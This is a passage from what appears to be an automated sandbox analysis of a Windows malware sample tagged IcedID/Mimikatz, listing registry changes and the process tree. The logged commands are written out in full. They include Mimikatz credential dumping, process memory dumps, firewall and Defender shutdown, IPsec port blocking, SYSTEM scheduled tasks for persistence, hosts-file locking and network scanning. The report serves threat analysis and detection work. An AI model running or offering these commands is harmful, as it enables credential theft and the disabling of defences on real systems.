\REGISTRY\USER\.DEFAULT\Software\Sysinternals hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ bbleyvb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" bbleyvb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" bbleyvb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" bbleyvb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" bbleyvb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe -
Modifies registry class 14 IoCs
Processes:
bbleyvb.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ bbleyvb.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
bbleyvb.exepid process 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid process 660 660 660 660 660 660 660 660 660 660 660 660 660 660 660 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exepid process 1668 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exebbleyvb.exebbleyvb.exevfshost.exehmuzmiedp.exeecfkkq.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exedescription pid process Token: SeDebugPrivilege 1668 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4952 bbleyvb.exe Token: SeDebugPrivilege 1856 bbleyvb.exe Token: SeDebugPrivilege 4740 vfshost.exe Token: SeDebugPrivilege 1292 hmuzmiedp.exe Token: SeLockMemoryPrivilege 872 ecfkkq.exe Token: SeLockMemoryPrivilege 872 ecfkkq.exe Token: SeDebugPrivilege 3944 hmuzmiedp.exe Token: SeDebugPrivilege 4860 hmuzmiedp.exe Token: SeDebugPrivilege 776 hmuzmiedp.exe Token: SeDebugPrivilege 760 hmuzmiedp.exe Token: SeDebugPrivilege 1276 hmuzmiedp.exe Token: SeDebugPrivilege 2248 hmuzmiedp.exe Token: SeDebugPrivilege 2448 hmuzmiedp.exe Token: SeDebugPrivilege 920 hmuzmiedp.exe Token: SeDebugPrivilege 1252 hmuzmiedp.exe Token: SeDebugPrivilege 4652 hmuzmiedp.exe Token: SeDebugPrivilege 2024 hmuzmiedp.exe Token: SeDebugPrivilege 4640 hmuzmiedp.exe Token: SeDebugPrivilege 5012 hmuzmiedp.exe Token: SeDebugPrivilege 5060 hmuzmiedp.exe Token: SeDebugPrivilege 2264 hmuzmiedp.exe Token: SeDebugPrivilege 5540 hmuzmiedp.exe Token: SeDebugPrivilege 4576 hmuzmiedp.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exebbleyvb.exebbleyvb.exexohudmc.exetyxtue.exebbleyvb.exebbleyvb.exepid process 1668 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe 1668 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe 4952 bbleyvb.exe 4952 bbleyvb.exe 1856 bbleyvb.exe 1856 bbleyvb.exe 2508 xohudmc.exe 3860 tyxtue.exe 4224 bbleyvb.exe 4224 bbleyvb.exe 6004 bbleyvb.exe 6004 bbleyvb.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.execmd.exebbleyvb.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid process target process PID 1668 wrote to memory of 4260 1668 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe cmd.exe PID 1668 wrote to memory of 4260 1668 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe cmd.exe PID 1668 wrote to memory of 4260 1668 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe cmd.exe PID 4260 wrote to memory of 3832 4260 cmd.exe PING.EXE PID 4260 wrote to memory of 3832 4260 cmd.exe PING.EXE PID 4260 wrote to memory of 3832 4260 cmd.exe PING.EXE PID 4260 wrote to memory of 4952 4260 cmd.exe bbleyvb.exe PID 4260 wrote to memory of 4952 4260 cmd.exe bbleyvb.exe PID 4260 wrote to memory of 4952 4260 cmd.exe bbleyvb.exe PID 1856 wrote to memory of 3912 1856 bbleyvb.exe cmd.exe PID 1856 wrote to memory of 3912 1856 bbleyvb.exe cmd.exe PID 1856 wrote to memory of 3912 1856 bbleyvb.exe cmd.exe PID 3912 wrote to memory of 4404 3912 cmd.exe cmd.exe PID 3912 wrote to memory of 4404 3912 cmd.exe cmd.exe PID 3912 wrote to memory of 4404 3912 cmd.exe cmd.exe PID 3912 wrote to memory of 2332 3912 cmd.exe cacls.exe PID 3912 wrote to memory of 2332 3912 cmd.exe cacls.exe PID 3912 wrote to memory of 2332 3912 cmd.exe cacls.exe PID 3912 wrote to memory of 4704 3912 cmd.exe cmd.exe PID 3912 wrote to memory of 4704 3912 cmd.exe cmd.exe PID 3912 wrote to memory of 4704 3912 cmd.exe cmd.exe PID 3912 wrote to memory of 2384 3912 cmd.exe cacls.exe PID 3912 wrote to memory of 2384 3912 cmd.exe cacls.exe PID 3912 wrote to memory of 2384 3912 cmd.exe cacls.exe PID 3912 wrote to memory of 4012 3912 cmd.exe cmd.exe PID 3912 wrote to memory of 4012 3912 cmd.exe cmd.exe PID 3912 wrote to memory of 4012 3912 cmd.exe cmd.exe PID 3912 wrote to memory of 2996 3912 cmd.exe cacls.exe PID 3912 wrote to memory of 2996 3912 cmd.exe cacls.exe PID 3912 wrote to memory of 2996 3912 cmd.exe cacls.exe PID 1856 wrote to memory of 2580 1856 bbleyvb.exe netsh.exe PID 1856 wrote to memory of 2580 1856 bbleyvb.exe netsh.exe PID 1856 wrote to memory of 2580 1856 bbleyvb.exe netsh.exe PID 1856 wrote to memory of 2372 1856 bbleyvb.exe netsh.exe PID 1856 wrote to memory of 2372 1856 bbleyvb.exe netsh.exe PID 1856 wrote to memory of 2372 1856 bbleyvb.exe netsh.exe PID 1856 wrote to memory of 4336 1856 bbleyvb.exe netsh.exe PID 1856 wrote to memory of 4336 1856 bbleyvb.exe netsh.exe PID 1856 wrote to memory of 4336 1856 bbleyvb.exe netsh.exe PID 1856 wrote to memory of 2900 1856 bbleyvb.exe cmd.exe PID 1856 wrote to memory of 2900 1856 bbleyvb.exe cmd.exe PID 1856 wrote to memory of 2900 1856 bbleyvb.exe cmd.exe PID 2900 wrote to memory of 4960 2900 cmd.exe wpcap.exe PID 2900 wrote to memory of 4960 2900 cmd.exe wpcap.exe PID 2900 wrote to memory of 4960 2900 cmd.exe wpcap.exe PID 4960 wrote to memory of 4416 4960 wpcap.exe net.exe PID 4960 wrote to memory of 4416 4960 wpcap.exe net.exe PID 4960 wrote to memory of 4416 4960 wpcap.exe net.exe PID 4416 wrote to memory of 4276 4416 net.exe net1.exe PID 4416 wrote to memory of 4276 4416 net.exe net1.exe PID 4416 wrote to memory of 4276 4416 net.exe net1.exe PID 4960 wrote to memory of 1928 4960 wpcap.exe net.exe PID 4960 wrote to memory of 1928 4960 wpcap.exe net.exe PID 4960 wrote to memory of 1928 4960 wpcap.exe net.exe PID 1928 wrote to memory of 2564 1928 net.exe net1.exe PID 1928 wrote to memory of 2564 1928 net.exe net1.exe PID 1928 wrote to memory of 2564 1928 net.exe net1.exe PID 4960 wrote to memory of 1900 4960 wpcap.exe net.exe PID 4960 wrote to memory of 1900 4960 wpcap.exe net.exe PID 4960 wrote to memory of 1900 4960 wpcap.exe net.exe PID 1900 wrote to memory of 916 1900 net.exe net1.exe PID 1900 wrote to memory of 916 1900 net.exe net1.exe PID 1900 wrote to memory of 916 1900 net.exe net1.exe PID 4960 wrote to memory of 964 4960 wpcap.exe net.exe
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2152
-
C:\Windows\TEMP\urfucfzpe\ecfkkq.exe"C:\Windows\TEMP\urfucfzpe\ecfkkq.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:872
-
C:\Users\Admin\AppData\Local\Temp\2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\kmydietv\bbleyvb.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3832 -
C:\Windows\kmydietv\bbleyvb.exeC:\Windows\kmydietv\bbleyvb.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4952
-
C:\Windows\kmydietv\bbleyvb.exeC:\Windows\kmydietv\bbleyvb.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4404
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2332
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4704
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2384
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4012
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:2996
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:2580
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:2372
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:4336
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nzlegstrv\yuiezklii\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\nzlegstrv\yuiezklii\wpcap.exeC:\Windows\nzlegstrv\yuiezklii\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4276
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2564
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:916
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:964
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4512
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2164
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:1016
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4760
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1888
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4428
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4792
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nzlegstrv\yuiezklii\lcsfzibut.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\nzlegstrv\yuiezklii\Scant.txt2⤵PID:4044
-
C:\Windows\nzlegstrv\yuiezklii\lcsfzibut.exeC:\Windows\nzlegstrv\yuiezklii\lcsfzibut.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\nzlegstrv\yuiezklii\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4564 -
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nzlegstrv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nzlegstrv\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:3108 -
C:\Windows\nzlegstrv\Corporate\vfshost.exeC:\Windows\nzlegstrv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4740 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mbybyunnc" /ru system /tr "cmd /c C:\Windows\ime\bbleyvb.exe"2⤵PID:4212
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1620
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mbybyunnc" /ru system /tr "cmd /c C:\Windows\ime\bbleyvb.exe"3⤵
- Creates scheduled task(s)
PID:2756 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bbpdkeeml" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F"2⤵PID:3088
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4268
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bbpdkeeml" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:364 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pbrbftibc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F"2⤵PID:212
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1424
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "pbrbftibc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:1736 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:5020
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:2796
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4200
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1696
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:3584
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:4236
-
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 780 C:\Windows\TEMP\nzlegstrv\780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1292 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:2388
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:776
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:60
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:1648
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:2492
-
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 1020 C:\Windows\TEMP\nzlegstrv\1020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3944 -
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4680
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:4220
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:1644
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:1620
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:4224
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:1564 -
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:4788
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:1736 -
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:3088
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:4060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:2952
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:1964
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:4644
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:4484
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:1660
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:4952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:4040
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:1068
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:3492 -
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:1464
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:4512 -
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:180
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:1048 -
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:1960
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:4464 -
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:2508 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2152 C:\Windows\TEMP\nzlegstrv\2152.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4860 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2552 C:\Windows\TEMP\nzlegstrv\2552.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:776 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2764 C:\Windows\TEMP\nzlegstrv\2764.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:760 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 2844 C:\Windows\TEMP\nzlegstrv\2844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1276 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3100 C:\Windows\TEMP\nzlegstrv\3100.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2248 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3844 C:\Windows\TEMP\nzlegstrv\3844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2448 -
C:\Windows\TEMP\nzlegstrv\hmuzmiedp.exeC:\Windows\TEMP\nzlegstrv\hmuzmiedp.exe -accepteula -mp 3980 C:\Windows\TEMP\nzlegstrv\3980.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:920 -
